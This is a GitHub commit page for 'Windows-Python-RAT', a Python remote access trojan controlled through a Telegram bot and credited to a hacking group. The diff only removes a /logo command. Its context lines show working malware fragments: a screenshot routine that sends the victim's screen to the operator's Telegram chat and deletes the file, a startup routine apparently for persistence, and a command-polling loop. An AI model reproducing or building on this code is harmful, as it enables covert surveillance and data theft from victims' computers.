Skip to content

Commit 11c95f3

Browse files
Windows-Python-RAT
Windows-Python-RAT, Coded By Sir.4m1R in The404Hacking
1 parent e4f050f commit 11c95f3

1 file changed

Lines changed: 0 additions & 13 deletions

File tree

Windows-Python-RAT.py

Lines changed: 0 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -91,8 +91,6 @@ def help_method(bot , update):
9191
[ /] /time
9292
[12] Windows-Python-RAT GitHub.
9393
[ /] /github
94-
[13] Windows-Python-RAT Logo.
95-
[ /] /logo
9694
9795
@The404Hacking
9896
Digital Security ReSearch Group
@@ -276,14 +274,6 @@ def screenshot_method(bot , update):
276274
photo.close()
277275
os.system("del C:\Windows\ScreenShot.png")
278276

279-
# /logo
280-
def logo_method(bot , update):
281-
chat_id = update.message.chat_id
282-
bot.sendMessage(chat_id , "Please Wait ...")
283-
chat_id = update.message.chat_id
284-
photo = open("Windows-Python-RAT.jpg" , "rb")
285-
bot.sendPhoto(chat_id,photo,"Windows-Python-RAT Logo !\n\nHelp: /help\n@The404Hacking")
286-
287277
# /startup
288278
def startup_method(bot , update):
289279
chat_id = update.message.chat_id
@@ -350,8 +340,5 @@ def startup_method(bot , update):
350340
github = CommandHandler("github", github_method)
351341
update.dispatcher.add_handler(github)
352342

353-
logo = CommandHandler("logo" , logo_method)
354-
update.dispatcher.add_handler(logo)
355-
356343
update.start_polling()
357344
# ------------------------------------------------------------------------

0 commit comments

Comments
 (0)